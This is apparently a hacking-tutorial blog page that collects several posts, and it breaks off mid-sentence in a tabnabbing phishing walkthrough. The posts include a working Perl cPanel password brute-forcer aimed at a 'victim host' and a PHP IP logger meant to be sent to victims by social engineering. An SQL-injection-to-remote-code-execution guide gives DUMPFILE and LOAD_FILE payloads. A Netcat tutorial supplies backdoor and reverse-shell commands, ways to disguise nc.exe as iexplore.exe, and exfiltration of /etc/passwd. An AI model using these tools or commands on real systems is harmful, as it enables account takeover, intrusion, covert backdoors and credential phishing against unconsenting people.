Cpanel Password Brute Forcer

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha0FOq6H3_NuqzqYMfE4uzSEm3n45BUfzQ7mKIM-8D04PI2-3s1cZ840CUtB0yUxTNdQ7o5c1ig6BQWhtb9r-EtG5nIuZ3WwOW70bZatbyZpyYMOITCAMbaJGvITIfkxoEwILcNk9W0IUh/s1600/cpanel+bruteforce.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha0FOq6H3_NuqzqYMfE4uzSEm3n45BUfzQ7mKIM-8D04PI2-3s1cZ840CUtB0yUxTNdQ7o5c1ig6BQWhtb9r-EtG5nIuZ3WwOW70bZatbyZpyYMOITCAMbaJGvITIfkxoEwILcNk9W0IUh/s640/cpanel+bruteforce.jpg" width="640" /></a></div><br /> <br /> <div class="program glow"><pre><code class="prettyprint"> # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : # http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/ use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ################################################## ############# # Cpanel Password Brute Force Tool # ################################################## ############# # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ################################################## ############# # (c)oded By Hessam-x / simorgh-ev.com # ################################################## ############# );exit;} headx(); $numstart = "-1"; sub headx() { print q( ################################################## ############# # Cpanel Password Brute Force Tool # # (c)oded By Hessam-x / simorgh-ev.com # ################################################## ############# ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } } </code></pre></div><span style="color: red;">Further Reading:</span><br /> <a href="http://www.turkhackteam.net/exploitler/22051-cpanel-password-brute-force-tool-perl-exploit.html" target="_blank"> Perl cPanel Bruteforcer</a><br /> <a href="http://bustedhumor.com/preview-cpanel-bruteforcer-safe-mode-open-basedir-bypasser-t-1951.html">Perl cPanel Bruteforcer Preview</a><br /> <br /> Regards,<br /> Hardeep Singh<br /> (<a href="http://www.fb.com/h4rdeep">www.fb.com/h4rdeep</a>)<br /> <div></div></div>

Cipher cPanel Hacking Hacking Tutorials Tutorials Cpanel Password Brute Forcer

# Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Hessam-x # Perl Version ( low speed ) # Oerginal Advisory : # ...

Read more »

Log Victim's IP

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPsDlATYYfFc2ovTVM96Y1Cpyhitu8FOG9ENtl1IMUuZPY78aqGmeE0ZN5BLNCFdReuzo2ke4XLwQkfDWzpyXUV5h0ZziqZAg5a17k4KB0wkpvoNzSuVMXasuYjBX_OOp93uq8zx2kmotD/s1600/ip+logger.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPsDlATYYfFc2ovTVM96Y1Cpyhitu8FOG9ENtl1IMUuZPY78aqGmeE0ZN5BLNCFdReuzo2ke4XLwQkfDWzpyXUV5h0ZziqZAg5a17k4KB0wkpvoNzSuVMXasuYjBX_OOp93uq8zx2kmotD/s400/ip+logger.gif" width="367" /></a></div><br /> I know you most of the time search on Google, Yahoo, etc, for tutorial on tracking your victim's IP. Yes, you can find many positive response, and there are also many ways by which you can log IP, but all those methods are a little bit tough as compared to my one, I have found a fresh technique by which you can log your victim's IP easily. This method is far most the best way of logging IP which I used myself many times.<br /> <br /> <br /> <h3>What we will need?</h3>This method doesn't require any heavy program or any other means. It will require:<br /> <br /> <br /> A Free and powerful hosting. I will recommend to use My3gb, or else your wish.<br /> A Php script to log IP which I have provided below.<br /> Some brain and a little bit HTML knowledge<br /> <br /> <h3>How to Setup your IP logger?</h3>After fulfilling all the required things, we will have to setup our IP logger so that it can log IPs. Create your account at any free hosting site,I use My3gb by myself, or you can also use any other hosting as per your choice. Open notepad and paste this script:<br /> <br /> <div class="program glow"><pre><code class="prettyprint"> <html> <?php $file = "log.txt"; $f=fopen($file, 'a'); fwrite($f,$_SERVER['REMOTE_ADDR']."\n\n"); fclose($f); ?> //You can customize this part to make your page look attractive </body> </html> </code></pre></div>Save this as Logger.php. Then you will have to create a text file with name <div class="system pop">log.txt </div>. After creating both these files, upload it to your website.<br /> <br /> <br /> <h3>How to log IPs?</h3>After uploading these files you will get a link, copy the link of your "Logger.php" file and send it to your victim by any means, but before doing this, test it for minimum two times on yourself. Now you can get the IP of your victim as soon as he open that link and the IPs will be logged in your "log.txt".<br /> <br /> Customize the Logger.php file<br /> This is very important step because as soon as your victim's visit your IP logging page then if he will find nothing or some suspicious thing then he will came to know that there is something wrong. For securing yourself from this suspicion you will have to customize your file, its easy if you have a little bit knowledge of HTML. Using HTML, you can simply made a small beautiful page for your victim. You can learn HTML from w3schools<br /> <br /> <br /> Now you will need some brains as I told above to send that Logger.php link to your victim, this can only be done by you, I cannot help you in this much, you can use Social Engineering or any other method like that.<br /> <br /> Regards,<br /> Hardeep Singh<br /> (<a href="mailto:h4rdeep@facebook.com">h4rdeep@facebook.com</a>)<br /> (<a href="http://www.fb.com/h4rdeep">www.fb.com/h4rdeep</a>)</div>

Hacking Hacking Tools Hacking Tutorials Scripts Tutorials Log Victim's IP

I know you most of the time search on Google, Yahoo, etc, for tutorial on tracking your victim's IP. Yes, you can find many positive re...

Read more »

Advanced MySQL Exploitation

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_9alg5xdw56RFcJShPskwW7oPSTRHCougEqWGuHGuQWRUmJiBkdJkBLO9s-YcF2NBv7BgiospLZJg-js17g4smMd8_2uVBzvp3gwGbET0D7oEp3JCLc0H6rIrIGg7COM5iYIz2OWfGNuQ/s1600/mysql+compromised.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Advance Mysql Exploitation" border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_9alg5xdw56RFcJShPskwW7oPSTRHCougEqWGuHGuQWRUmJiBkdJkBLO9s-YcF2NBv7BgiospLZJg-js17g4smMd8_2uVBzvp3gwGbET0D7oEp3JCLc0H6rIrIGg7COM5iYIz2OWfGNuQ/s400/mysql+compromised.jpg" title="Advance Mysql Exploitation" width="400" /></a></div> <br /> Advanced Mysql Exploitation<br /> <br /> 1Abstract...................................................................3<br /> 2 Introduction .............................................................3<br /> 3 Stacked Query.............................................................3<br /> 4 Attacking MySQL on applications that do support stacked queries...........4<br /> 5 Attacking MySQL on applications that do not support stacked queries.......5<br /> 6 Fingerprinting the web server directory...................................7<br /> 6.1 Fingerprint through error message method................................7<br /> 6.2 Fingerprint by LOAD_FILE method....................................7<br /> 7 Maximum size of arbitrary code allowed....................................7<br /> 8 Arbitrary file compression/decompression .................................8<br /> 9 Dealing with columns......................................................8<br /> 10 Remote code execution on LAMP............................................9<br /> 11 Remote code execution on WAMP............................................10<br /> References .................................................................11<br /> <h3> 1 Abstract</h3> This document discusses in detail how SQL Injection vulnerabilities can be used to conduct remote code execution on the LAMP (Linux, Apache, MySQL, and PHP) or WAMP (Windows, Apache, MySQL and PHP) environments. Attackers performing SQL injection on a MySQL platform must deal with several limitations and constraints. For example, the lack of multiple statements in one query makes MySQL an unpopular platform for remote code execution, compared to other platforms. A lot of research has been performed in the last few years, concentrating on arbitrary code execution by attacking SQL Injection vulnerabilities. However, these types of attacks concentrate on the DBMS connectors that support stacked queries. This document will explain how different methods can be used to achieve the same result on a DBMS connector that does<br /> not support stacked queries.<br /> <h3> 2 Introduction</h3> SQL injection is an attack where malicious code is injected into the SQL statement. SQL Injection attack allows a malicious user to retrieve the structure of the database and uncover information regarding the application’s operating environment. It has been proven that arbitrary code execution is the highest risk level a malicious user can achieve when conducting SQL injection attack. MySQL is a popular database server and acts as the database component of the LAMP (Linux, Apache, MySQL and PHP) and WAMP (Windows, Apache, MySQL and PHP) software stacks. DBMS connectors for this technology do not support stacked queries by default. This makes the same technique used to conduct remote code execution on platforms that support stacked queries, cannot be applied on this platform.<br /> <br /> <h3> 3 Stacked Query</h3> Stacked query is a term to define if a database connection layer can execute more than one query at a time. Each query is separated by semicolon. The following example is an example of stacked queries in an SQL Injection attack:<br /> SELECT name FROM record WHERE id = 1; DROP table record; DROP table address--<br /> <br /> In the example above, there are three separate queries requested at one time. The first query is the actual query from the application. These queries are allowed when called within the database server. However, when this stacked query is called within the MySQL PHP application by default, an error message will be replayed back by the application and none of the queries will be executed.<br /> <h3> 4 Attacking MySQL on applications that do support stacked queries</h3> It has been discovered that the MySQL UDF (User Define Function) library [4] creation technique, can be used to conduct remote code execution on applications which support stacked queries. This has been clearly explained by David Litchfield in The Database Hacker’s Handbook [5].<br /> At Blackhat Europe 2009, Bernando Damele explained the similar technique in detail. The steps below are taken from Bernando Damele’s whitepaper [6].<br /> 1) Create a support table with one field, data-type longblob.<br /> 2) Encode the local file content to its corresponding hexadecimal string.<br /> 3) Split the hexadecimal encoded string into chunks long 1024 characters each<br /> 4) INSERT [7] the first chunk into the support table's field.<br /> 5) UPDATE [8] the support table's field by appending to the entry the chunks from the<br /> second to the last.<br /> <br /> <br /> 6) Export the hexadecimal encoded file content from the support table's entry to the destination file path by using SELECT's INTO DUMPFILE [9] clause. This is possible because on MySQL, a query like SELECT 0x41 returns the corresponding ASCII character A. Here are some requirements to perform this action:<br /> 1) DBMS connector must support stacked queries.<br /> 2) Session user is required to have FILE [10], INSERT, CREATE [11] and UPDATE privileges.<br /> 3) On some MySQL versions below 5.1.19, shared library [12] path must be writable by a session user. Prior knowledge of this directory is also required.<br /> 4) On some MySQL versions 5.1.19 and above, system variable plugin_dir [13] must exist and be writable by a session user. Prior knowledge of this directory is also required.<br /> It has been known that there are some limitations to this technique. By default, MySQL Linux runs as a mysql user and the shared library path is not writable by this user.<br /> <br /> However, this behavior is not applied to MySQL on Windows. MySQL on Windows runsas a Local System user and by default, file created by this user can be overwritten onto any folder. For the recent versions of MySQL, the directory belonging to system variable plugin_dir does not exist. This directory is required to be created first and writable by a session user.<br /> <br /> <br /> <h3> 5 Attacking MySQL on applications that do not support stacked queries</h3> Due to the unsupported stacked queries on MySQL-PHP platform, execution of another statement after the actual statement is not possible. However, execution of another SELECT statement is possible using UNION syntax [14]. UNION syntax is used to combine the result from multiple SELECT statements into a single result set. The statement below taken from MySQL 5.1 Refence Manual:<br /> SELECT<br /> [ALL | DISTINCT | DISTINCTROW ]<br /> [HIGH_PRIORITY]<br /> [STRAIGHT_JOIN]<br /> [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]<br /> [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]<br /> select_expr [, select_expr ...]<br /> [FROM table_references<br /> [WHERE where_condition]<br /> [GROUP BY {col_name | expr | position}<br /> [ASC | DESC], ... [WITH ROLLUP]]<br /> [HAVING where_condition]<br /> [ORDER BY {col_name | expr | position}<br /> [ASC | DESC], ...]<br /> [LIMIT {[offset,] row_count | row_count OFFSET offset}]<br /> [PROCEDURE procedure_name(argument_list)]6<br /> [INTO OUTFILE 'file_name' export_options<br /> | INTO DUMPFILE 'file_name'<br /> | INTO var_name [, var_name]]<br /> [FOR UPDATE | LOCK IN SHARE MODE]]<br /> <br /> It was discovered that only SELECT INTO DUMPFILE can be used to write arbitrary binary files onto the database server using UNION SELECT. When injecting this statement, only one statement can be used to create the whole file. Also, this file cannot be overwritten by calling another SELECT INTO DUMPFILE statement to write into the same file.<br /> The statement below taken from MySQL 5.1 Reference Manual:<br /> Only the last SELECT statement can use INTO OUTFILE/DUMPFILE. (However, the entire UNION result is written to the file.)<br /> Due to the nature of the UNION statement, results retrieved from the first query will be the first set of data to write into our arbitrary file.<br /> For example:<br /> SELECT content FROM data WHERE id=21 UNION SELECT 0x8A789C....... INTO DUMPFILE ‘file’<br /> If the first query returns any data, this data will overwrite the file header. To prevent this, we can inject any non existing value in the WHERE clause so no data would be extracted from the first query. This is to ensure that only our chosen data is written into the file. The file is also required to be located in a directory where we can execute it. In the case of a DBMS connector that does not support stacked queries, the best directory to upload this file onto an Apache web server directory. However, this is only possible in an environment where the MySQL database and Apache web server are on the same machine. By uploading onto the Apache web server directory, a PHP script can be used to execute the file using the SYSTEM function [15]. Here are some requirements to perform this action:<br /> 1) Prior knowledge of the Apache web server directory.<br /> 2) Session user is required to have FILE privilege.<br /> 3) Session user is required to have access to write onto the web server directory.7<br /> <h3> 6 Fingerprinting the web server directory</h3> In some cases where the web server root directory is not located in the default folder during the installation process, fingerprinting can be used to achieve this information. There are two methods that can be used to fingerprint the web server directory. It can be fingerprinted by forcing the application to return an error message or by loading the default<br /> location of the Apache configuration file.<br /> <br /> <br /> <h3> 6.1 Fingerprint through error message method</h3> By default, custom error message is turned off by PHP. There are many ways to force the application to return an error message that contains internal information including the web server directory. For example, this error message can be generated by injecting a single quote as part of the SQL data. Here is an example of the error message returned by the<br /> PHP application when a single quote is injected, as part of the SQL data.<br /> Fatal error: Call to a member function execute() on a non-object in /var/www/output.php on line 15<br /> <br /> <h3> 6.2 Fingerprint through LOAD_FILE method</h3> LOAD_FILE [16] can be used to read a file on the database server. To use this function, FILE privilege is required by the session user. The file must also be readable by all and its size must be less than max_allowed_packet bytes value in the Apache configuration file. A default apache configuration file meets this requirement. The DocumentRoot directive [17] in this file contains the path of the Apache web server root directory and can be used to disclose this information. Here is an example of the query to load an Apache configuration file on Apache version 2.2, in a default installation of Ubuntu Linux.<br /> SELECT LOAD_FILE('/etc/apache2/sites-available/default')<br /> 7 Maximum size of arbitrary code allowed<br /> The LimitRequestLine directive [17] in the Apache configuration file allows the web server to reduce the size of an HTTP request . This includes all information passed in the query as part of the GET request. The default value for this directive is 8190 bytes. If the SQL Injection is discovered on the GET request and our query including the arbitrary code 8<br /> is larger than this value, Apache web server would response with the HTTP Status Code 414 and the request would not be processed. By default, the Apache web server sets the LimitRequestBody directive to 2GB [17]. This is the allowed size of an HTTP request message body. If the SQL Injection is discovered in a POST request, 2GB will give us enough room to upload our arbitrary code. Web application firewalls also have the ability to terminate a long request. This long request is normally detected as a buffer overflow attack.<br /> <br /> <h3> 8 Arbitrary file compression/decompression</h3> PHP contains a module called Zlib [18] that can be used to read and write gzip compressed files. This module can be abused to compress the arbitrary file into a smaller file using the gzcompress function [19]. The Zlib module is able to compress our file from 9635 bytes to only 630 bytes. When the compressed file is successfully uploaded on the web server, gzuncompress function [20] can be used to decompress the file. However, this is only possible in an environment where the MySQL database and Apache web server are on the same machine.<br /> <br /> <h3> 9 Dealing with columns</h3> A UNION clause will combine the result from multiple SELECT statements into a single result set. The two queries must have the same number of columns. Due to this reason, some unnecessary data will be added to our data which could potentially corrupt our file.<br /> For example:<br /> SELECT name, add, content FROM data WHERE id=21 UNION SELECT NULL,NULL, 0x8A789C....... INTO DUMPFILE ‘file’<br /> The result from the first query will be added into our compressed file. As mentioned in the section 5, we can inject any nonexisting value into the WHERE clause so there would be no data extracted from the first query. However, due to the extra columns required in this statement, any bad character data added into the first two columns also could potentially corrupt our file. To prevent our file header from being overwritten by any bad character data, we can add our data in the first column and inject any random data into the other columns as seen in the following example.<br /> 9<br /> SELECT name, add, content FROM data WHERE id=4444 UNION SELECT 0x8A789C.........,0x00,0x00 INTO DUMPFILE ‘file’<br /> The first column in the example above is filled with our compressed arbitrary data. When Zlib library is used, the Adler32 checksum [21] will be found at the end of the compressed data in the first column . As mentioned in the RFC 1950 [22] , any data which may appear after the Adler32 checksum is not part of the Zlib stream. We can abuse this functionality by injecting any value into the other columns. This may help the compressed arbitrary file to be decompressed without having any issues.<br /> Another method is to ensure that all the arbitrary data is filled in sequence into all columns in the second query. It would not be an issue if one of the columns contains more data than the other columns as seen in the following example.<br /> SELECT name, add, content FROM data WHERE id=4444 UNION SELECT 0x8A, 0x78,0x9CED......9EEC....... INTO DUMPFILE ‘file’<br /> <br /> <h3> 10 Remote code execution on LAMP</h3> Remote code execution on LAMP contains several limitations and constraints. By default, MySQL runs as a mysql user. Arbitrary files created through SELECT INTO DUMPFILE can only be uploaded onto the directory where the MySQL user is allowed to write onto. By default, the uploaded file is not executable but readable. This file also is owned by a mysql user. A PHP script can be used to read the file and write the same file content to a new file.<br /> This new file created is owned by the www-data user and the same PHP script can be used to change the permission of this file to be executable using the PHP SYSTEM function. To perform this action, this file needs to be uploaded onto the web server directory that is writable by MySQL and www-data users. By default, any directory created by other users are not writable by these users. In some cases, these directories are set to be writable. An example of this can be found in an application where a user is allowed to upload content onto the web server directories, through the file upload feature.<br /> If the writable directories can be discovered on the web server and the file is successfully uploaded, PHP script can be used to execute the malicious file using the PHP SYSTEM function.<br /> <h3> 11 Remote code execution on WAMP</h3> Remote code execution on WAMP contains fewer limitations and constraints in order to function. By default, MySQL runs as a Local System user and files created through SELECT INTO DUMPFILE can be uploaded onto any of the web server directories. By<br /> default, this file is executable. Just like on the LAMP platform, PHP script can be used to execute the malicious file using the PHP SYSTEM function.</div>

Hacking Hacking Tutorials SQL Injection Tutorials Advanced MySQL Exploitation

Advanced Mysql Exploitation 1Abstract...................................................................3 2 Introduction ...............

Read more »

Netcat Explained

<div dir="ltr" style="text-align: left;" trbidi="on"> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipedql6wKPYdHI037e9Fw0WdDAqG2fym2zcqskBbp25tpzTQ4ezPzG3UQdH_Ubn1WMyZlYrrukqkG1j7txXymgNcMEI2f1DykRhEv8ghyphenhyphenO3BsOdPAmw7enITZlSm0hzYRgKHOpiAI3iPU/s1600/ncat-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipedql6wKPYdHI037e9Fw0WdDAqG2fym2zcqskBbp25tpzTQ4ezPzG3UQdH_Ubn1WMyZlYrrukqkG1j7txXymgNcMEI2f1DykRhEv8ghyphenhyphenO3BsOdPAmw7enITZlSm0hzYRgKHOpiAI3iPU/s1600/ncat-logo.png" /></a></div> <span class="Apple-style-span" style="background-color: #fafafa; color: #333333; font-family: "verdana" , "arial" , "tahoma" , "calibri" , "geneva" , sans-serif; font-size: 13px;"><span style="font-size: medium;"><u>NETCAT AND CRYPTCAT</u></span></span><br /> <br /> <div id="post_message_14830" style="margin: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"> <br /> This tutorial is a combination of different sources. I can not take credit for all the information I just compiled it and added my touch to it.<br /> <br /> <h3> Disclaimer</h3> For educational uses only. I do not condone any use of this tutorial for malicious behavior. Its simple. If its not your computer. Don't mess with it.<br /> <br /> <h3> What is netcat?</h3> Netcat is a computer networking service for reading from and writing network connections using TCP or UDP Netcat is designed to be a dependable "back-end" device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.<br /> <br /> <h3> Download</h3> The official download website of Netcat for both Windows and Linux is <a href="http://www.downloadnetcat.com/" style="color: #417394; text-decoration: none;" target="_blank">http://www.downloadnetcat.com/</a>. I am not going to go into depth on how to install. Basically if your running windows place nc.exe in system32 folder. If your running Linux you sudo apt-get install netcat (or whatever the command is for your version of Linux)or compile it yourself from the tarball.<br /> <br /> <h3> Command Line</h3> -d Puts netcat in stealth mode. Therefore it runs in the background. This command is only available on windows.<br /> -e <command> If compiled into the GAPING_SECURITY_HOLE option, a listening netcat will execute <command> any time someone makes a connection on the port to which it is listening<br /> -i <seconds> This is the delay interval. This is the amount of time netcat waits between data sends.<br /> -g <route-list>Netcat supports loose source routing.<br /> -G <hop-pointer> This option allows you to control which ip in your route-list the next hop.<br /> -l This is listen mode.<br /> -L This is a stronger listen mode only availiable in windows. It tells Netcat to restart its listen mode with the same command-line options after a connection is closed<br /> -n Tells netcat not to do any hostname lookups.<br /> -o <hexfile> Does a hex dump on the data and stores it in hexfile.<br /> -p <port> Specifies the port<br /> -r Netcatchooses random local and remote ports.<br /> -sSpecifies the source ip adress netcat should use when making its connections.<br /> -t If compiled with the telnet option netcat will be able to handle telnet negotiation with a telnet server.<br /> -u Tells netcat to use UDP instead of TCP.<br /> -v Verbose. Controls how much netcat will tell you what its doing.<br /> -w <seconds> Controls how long netcat will wait before canceling connection.<br /> -z Tells netcat to only send enough data to find which ports are listening in your specified range.<br /> <br /> <br /> <h3> Usage</h3> <br /> <strong>Netcat Backdoor Victim</strong>:<br /> <div class="command wobble-horizontal"> nc -L -d -p <port> -t -e cmd.exe</div> <br /> <br /> -L is the listening command. -d tells netcat not to open a window when running. -p assigns a port. -t is for telnet. -e activates cmd.exe when client connects to it<br /> <br /> <br /> <strong>Client</strong>:<br /> <div class="command wobble-horizontal"> nc -v <ip address of victim></div> <br /> <br /> <br /> <br /> note: In this example netcat runs in the background on the victims machine. A system admin may open task manager and see that nc.exe is running. A smart hacker would change nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspiscion. Now, if a system administrator runs a trusted netstat –a –n command at the DOS prompt, he or she might notice that something is running on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons and netstat output can be time consuming to parse, especially on systems<br /> with a lot of activity. Hackers might try a different approach. If they've infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you'd expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run: <br /> <div class="system highlight pop"> nc –l –p 80 </div> From the Windows box, the hacker could cleverly "hide" Netcat again and issue these commands:<br /> <div class="command wobble-horizontal"> mkdir C:\Windows\System32\Drivers\q<br /> move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe<br /> cd Windows\System32\Drivers\q<br /> WINDOWS\System32\DRIVERS\q>iexplore.exe<br /> Cmd line: -d -e cmd.exe originix 80<br /> WINDOWS\System32\DRIVERS\q> </div> Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there's no way of restarting it on the Windows side.<br /> <br /> <br /> <h3> Port Scanning Command:</h3> <div class="command wobble-horizontal"> nc -z -w2 <IP Address> 1-6000 </div> <br /> <br /> <br /> -z tells netcat to run a port scan. -w2 tells netcat to wait for 2 seconds before disconnecting. 1-6000 are the ports to scan. If you want you can add -v or -vv to see more of what is going on making it:<br /> nc -vv -z -w2 <IP Address> 1-6000<br /> <br /> <br /> <h3> Banner Grabbing</h3> Banner grabbing is a function that helps you see what is running behind a given port.<br /> <br /> Command:<br /> <div class="command wobble-horizontal"> nc <IP Address> 80</div> <br /> <br /> <br /> Command:<br /> <div class="command wobble-horizontal"> GET HTTP<br /> or<br /> HEAD / HTTP/1.0</div> <br /> <strong> (Hit return twice)</strong><br /> <br /> <br /> <h3> File Transfer:</h3> From system in which file is stored:<br /> <div class="command wobble-horizontal"> nc –l –u –p 55555 < file_we_want</div> <br /> <br /> Command of receiving system:<br /> <div class="command wobble-horizontal"> nc –u –targethost 55555 > copy_of_file</div> <br /> <br /> <br /> This can be used to grab the etc/passwd file. This can be done by utilizing the command<br /> <div class="command wobble-horizontal"> nc -l -u -p 55555 < /etc/passwd</div> <br /> <br /> <br /> Netcat does file transfer under the radar. It does not leave any logs whatsoever. Many other FTP do leave logs.<br /> <br /> <br /> <h3> Setting a Trap</h3> You could run a instance of netcat on a port a hacker may be expecting to find vulnerabilities. If your good you may be able to trap the hacker using something like command:<br /> <div class="command wobble-horizontal"> nc –l –v –e <a href="http://fakemail.pl/">fakemail.pl</a> –p 25 >> traplog.txt</div> <br /> <br /> Your fakemail script might echo some output to tell the world it's running a version of sendmail and practically beg a script kiddy to come hack it . Once he does you could flood him with what ever you want. If your nice you could just run a script to grab his IP.<br /> <br /> <br /> <h3> Linux Backdoor</h3> Most of this tutorial was built around hacking windows with netcat. However, the same can be done on a Linux system with the command:<br /> <div class="command wobble-horizontal"> nc –u –l –p 55555 –e /bin/sh nc</div> <br /> <br /> <h3> Create your own usage</h3> There are several shell scripts and C programs that generate even more possible ways to utilize netcat. With a little understanding of computer programming you can create your own usage of netcat. I encourage you to try.<br /> <br /> <br /> <h3> Cryptcat</h3> Cryptcat is what is self explanatory. It is an encrypted version of netcat. It uses an enhanced version of twofish encryption to keep netcat traffic hidden.<br /> <br /> <br /> You might argue that netcat is a glorified telnet. Well it is. However it has far more capabilities. Netcat is my favorite tool because of its simplicity. It is easily compiled into scripts or code. You may say "Abstrakt, are you an idiot? There are programs such as meterpreter that can be used as backdoors that are far more easier." To this I say yes I am an idiot, but netcat is much more than just a backdoor. You may also say "Abstrakt, you are an idiot. How do you get a copy of nc.exe into the system32 folder without having access to the computer?" Again I agree I am an idiot but I encourage you to learn to program in C or write scripts in perl and find a way to compile nc.exe into a code or script. It is a great tool to have in your arsenal even if you are a meterpreter fan. There are many other uses of netcat than what I explained. I encourage you to look further into it. Also this is my first post on intern0t. All criticism is welcome and preferred. I plan to create more advanced netcat tutorials in the future going further in depth with each usage.<br /> <br /></div> </div>

Cheet Sheet Cryptcat Hacking Netcat Tutorials Netcat Explained

NETCAT AND CRYPTCAT This tutorial is a combination of different sources. I can not take credit for all the information I just compil...

Read more »

Phishing Attack Using Tabnabbing

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVpOqWk1DSAJKLIjKip-S5lRZrI4t7RucRcBg0q66ThDxVKtuzCldtQQfM8iabX8sYdY2EGrJ2yVoiTKcKwzpSv2CI21A6WxwI7BNbk14eqpGMVpf5nVGLxkB5v0oHX1CG-jUashj_FEo/s1600/tab-napping.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVpOqWk1DSAJKLIjKip-S5lRZrI4t7RucRcBg0q66ThDxVKtuzCldtQQfM8iabX8sYdY2EGrJ2yVoiTKcKwzpSv2CI21A6WxwI7BNbk14eqpGMVpf5nVGLxkB5v0oHX1CG-jUashj_FEo/s1600/tab-napping.jpg" width="320" /></a></div> <br /> <div class="post-body entry-content"> <span class="Apple-style-span"><span id="7140679708706166316"></span></span><br /> <div> <div> <span class="Apple-style-span"><span id="7140679708706166316">Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You've escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.</span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><br /></span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316">What we don't expect is that a page we've been looking at will change behind our backs, when we aren't looking. That'll catch us by surprise.</span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><br /></span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><br /></span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><b>How Phishing Attack Using Tabnabbing Works</b></span></span></div> <div> <ol> <li style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;"><span class="Apple-style-span"><span id="7140679708706166316">A user navigates to your normal looking site.</span></span></li> <span class="Apple-style-span"><span id="7140679708706166316"> <li style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;">You detect when the page has lost its focus and hasn't been interacted with for a while.</li> <li style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;">Replace the favicon with the Gmail favicon, the title with "Gmail: Email from Google", and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.</li> <li style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;">As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they'll see the standard Gmail login page, assume they've been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.</li> <li style="margin: 0px 0px 0.25em; padding: 0px; text-indent: 0px;">After the user has entered their login information and you've sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.</li> </span></span></ol> </div> </div> <div> <div> <span class="Apple-style-span"><span id="7140679708706166316">In this attack, the phisher need not even change the Web address displayed in the browser's navigation toolbar. Rather, this particular phishing attack 